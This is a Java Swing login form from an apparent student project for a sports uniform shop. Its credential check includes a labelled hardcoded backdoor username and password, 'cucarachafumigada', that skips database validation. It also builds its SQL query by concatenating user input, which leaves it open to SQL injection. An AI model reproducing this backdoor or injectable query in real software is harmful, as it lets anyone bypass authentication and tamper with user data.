/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
package Formulario;

import Conectar.Conectar;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.Statement;
import javax.swing.JOptionPane;

/**
 *
 * @author CARLOS
 */
public class login extends javax.swing.JFrame {

    /**
     * Creates new form login
     */
    public login() {
        initComponents();
        this.setLocationRelativeTo(null);
    }
    
    void validar_credencial()
    {
    int resultado = 0;
    int puerta_trasera = 0;
    String usuario = txt_usuario.getText();
    String pass = String.valueOf(txt_pass.getPassword());
    String consulta = "SELECT * FROM login WHERE `usuario_usuario`='"+ usuario + "' AND `pass_usuario`='"+pass+"'";
    
    if ((usuario.equals("cucarachafumigada")) && (pass.equals("cucarachafumigada"))) {
        this.dispose();
        
        JOptionPane.showMessageDialog(null, "Bienvenido a deportes total " + usuario);
        Principal princ = new Principal();
        princ.setVisible(true);
        princ.pack();
        
       
        puerta_trasera = 1; 
    } // fin de la condición puerta trasera 
            
    try{
        Statement st = cn.createStatement();
        ResultSet rs = st.executeQuery(consulta);
        
        if(rs.next()){
            resultado = 1;
            if(resultado ==1){
                JOptionPane.showMessageDialog(null, "Bienvenido a deportes total " + usuario);
                //Principal princ = new Principal();
                //princ.setVisible(true);
                //this.dispose();
                //princ.pack();      
                ControlAcceso ca=new ControlAcceso();
                ca.NivelAcceso(usuario);
                this.dispose();
            } // fin de la condición resultado
        } // fin de la condicion rs
        
        else{
            if(puerta_trasera ==1){
                JOptionPane.showMessageDialog(null, "Alerta!!! es sistema ha sido hackeado");
            }
            else{
                JOptionPane.showMessageDialog(null, "Error de contraseña");
            }
        }
    }catch(Exception ex){
        JOptionPane.showMessageDialog(null, "Error en el metodo validar crendencial " + ex);
        
        
    }
    
    
    }

    /**
     * This method is called from within the constructor to initialize the form.
     * WARNING: Do NOT modify this code. The content of this method is always
     * regenerated by the Form Editor.
     */
    @SuppressWarnings("unchecked")
    // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
    private void initComponents() {

        txt_usuario = new javax.swing.JTextField();
        txt_pass = new javax.swing.JPasswordField();
        jLabel2_contraseña = new javax.swing.JLabel();
        Label_1usuario = new javax.swing.JLabel();
        btn_iniciar_sesion = new javax.swing.JButton();
        jButton1 = new javax.swing.JButton();
        jLabel1 = new javax.swing.JLabel();
        jLabel2 = new javax.swing.JLabel();
        JLabel_fondo = new javax.swing.JLabel();

        setDefaultCloseOperation(javax.swing.WindowConstants.EXIT_ON_CLOSE);
        setUndecorated(true);
        getContentPane().setLayout(new org.netbeans.lib.awtextra.AbsoluteLayout());
        getContentPane().add(txt_usuario, new org.netbeans.lib.awtextra.AbsoluteConstraints(140, 230, 192, 32));

        txt_pass.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                txt_passActionPerformed(evt);
            }
        });
        getContentPane().add(txt_pass, new org.netbeans.lib.awtextra.AbsoluteConstraints(140, 290, 192, 31));

        jLabel2_contraseña.setFont(new java.awt.Font("Cambria", 1, 14)); // NOI18N
        jLabel2_contraseña.setText("CONTRASEÑA");
        getContentPane().add(jLabel2_contraseña, new org.netbeans.lib.awtextra.AbsoluteConstraints(20, 300, -1, -1));

        Label_1usuario.setFont(new java.awt.Font("Cambria", 1, 14)); // NOI18N
        Label_1usuario.setText("USUARIO");
        getContentPane().add(Label_1usuario, new org.netbeans.lib.awtextra.AbsoluteConstraints(30, 240, -1, -1));

        btn_iniciar_sesion.setFont(new java.awt.Font("Cambria", 1, 14)); // NOI18N
        btn_iniciar_sesion.setText("INICIAR SESION");
        btn_iniciar_sesion.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                btn_iniciar_sesionActionPerformed(evt);
            }
        });
        getContentPane().add(btn_iniciar_sesion, new org.netbeans.lib.awtextra.AbsoluteConstraints(440, 400, -1, -1));

        jButton1.setBackground(new java.awt.Color(204, 0, 0));
        jButton1.setFont(new java.awt.Font("Dialog", 1, 24)); // NOI18N
        jButton1.setText("X");
        jButton1.addActionListener(new java.awt.event.ActionListener() {
            public void actionPerformed(java.awt.event.ActionEvent evt) {
                jButton1ActionPerformed(evt);
            }
        });
        getContentPane().add(jButton1, new org.netbeans.lib.awtextra.AbsoluteConstraints(550, 10, -1, -1));

        jLabel1.setIcon(new javax.swing.ImageIcon(getClass().getResource("/Imagenes/mini_OFICIAL_LOGO(2) 130x120.png"))); // NOI18N
        getContentPane().add(jLabel1, new org.netbeans.lib.awtextra.AbsoluteConstraints(0, 10, -1, -1));

        jLabel2.setIcon(new javax.swing.ImageIcon("E:\\DOCUMENTOS\\NetBeansProjects\\TiendaUniformes\\src\\Imagenes\\usuario-registrados.png")); // NOI18N
        jLabel2.setText("jLabel2");
        getContentPane().add(jLabel2, new org.netbeans.lib.awtextra.AbsoluteConstraints(340, 130, 240, 240));

        JLabel_fondo.setIcon(new javax.swing.ImageIcon("E:\\DOCUMENTOS\\NetBeansProjects\\TiendaUniformes\\src\\Imagenes\\fondoazul.jpg")); // NOI18N
        JLabel_fondo.setText("jLabel1");
        getContentPane().add(JLabel_fondo, new org.netbeans.lib.awtextra.AbsoluteConstraints(0, 0, 620, 460));

        pack();
    }// </editor-fold>//GEN-END:initComponents

    private void txt_passActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_txt_passActionPerformed
        validar_credencial();
    }//GEN-LAST:event_txt_passActionPerformed

    private void btn_iniciar_sesionActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_btn_iniciar_sesionActionPerformed

        validar_credencial();

    }//GEN-LAST:event_btn_iniciar_sesionActionPerformed

    private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {//GEN-FIRST:event_jButton1ActionPerformed
        // TODO add your handling code here:
        this.dispose();
    }//GEN-LAST:event_jButton1ActionPerformed

    /**
     * @param args the command line arguments
     */
    public static void main(String args[]) {
        /* Set the Nimbus look and feel */
        //<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) ">
        /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel.
         * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html 
         */
        try {
            for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) {
                if ("Nimbus".equals(info.getName())) {
                    javax.swing.UIManager.setLookAndFeel(info.getClassName());
                    break;
                }
            }
        } catch (ClassNotFoundException ex) {
            java.util.logging.Logger.getLogger(login.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (InstantiationException ex) {
            java.util.logging.Logger.getLogger(login.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (IllegalAccessException ex) {
            java.util.logging.Logger.getLogger(login.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        } catch (javax.swing.UnsupportedLookAndFeelException ex) {
            java.util.logging.Logger.getLogger(login.class.getName()).log(java.util.logging.Level.SEVERE, null, ex);
        }
        //</editor-fold>

        /* Create and display the form */
        java.awt.EventQueue.invokeLater(new Runnable() {
            public void run() {
                new login().setVisible(true);
            }
        });
    }

    // Variables declaration - do not modify//GEN-BEGIN:variables
    private javax.swing.JLabel JLabel_fondo;
    private javax.swing.JLabel Label_1usuario;
    private javax.swing.JButton btn_iniciar_sesion;
    private javax.swing.JButton jButton1;
    private javax.swing.JLabel jLabel1;
    private javax.swing.JLabel jLabel2;
    private javax.swing.JLabel jLabel2_contraseña;
    private javax.swing.JPasswordField txt_pass;
    private javax.swing.JTextField txt_usuario;
    // End of variables declaration//GEN-END:variables
    Conectar cc=new Conectar();
    Connection cn=cc.conexion();
}
